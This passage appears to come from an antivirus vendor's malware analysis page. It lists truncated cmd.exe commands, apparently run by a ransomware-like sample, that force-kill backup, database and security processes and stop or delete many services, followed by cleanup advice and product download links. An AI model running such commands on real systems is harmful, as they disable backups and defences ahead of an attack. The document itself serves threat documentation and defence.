  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingser...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\net1.exe' stop UTUService

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play